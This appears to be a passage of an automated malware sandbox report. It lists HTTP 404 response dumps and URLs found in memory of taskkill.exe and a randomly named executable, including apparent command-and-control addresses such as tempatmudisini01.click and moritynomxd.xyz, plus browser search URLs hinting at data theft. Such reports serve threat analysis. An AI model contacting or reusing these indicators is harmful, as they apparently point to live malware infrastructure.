78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 19 Sep 2024 13:07:06 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 19 Sep 2024 13:07:09 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003A84000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003FE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tempatmudisini01.click/lybf/?8Xv=VLHph&00yp=Y340GT3aYbxxYgEUood/mUhipI1uyVEinTnWDrZvpldzXPMOd
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Palcoconnector.net
        Source: dGGVPduKBhByY.exe, 00000005.00000002.881610110.0000000000ABE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moritynomxd.xyz
        Source: dGGVPduKBhByY.exe, 00000005.00000002.881610110.0000000000ABE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moritynomxd.xyz/1tk5/
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcy
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcy
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv6riP8JaBO
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv6
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=ns
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/display.cfm
        Source: taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/px.js?ch=1
        Source: taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/px.js?ch=2
        Source: taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/sk-logabpstatus.php?a=OGRiNXNPSDlMUGVYb1ZTS0xtY0NMZjU0Q29NQTZaT29TSnk0
        Source: taskkill.exe, 00000004.00000002.882444699.0000000061EA6000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
        Source: taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
        Source: taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
        Source: dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
        Source: taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: taskkill.exe, 00000004.00000002.881943022.00000000032AA000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.000000000380A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand=
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
        Source: taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
        Source: taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: 21E1tK1Ol.4.drString found in binary or memory: https://www.google.com/favicon.ico
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
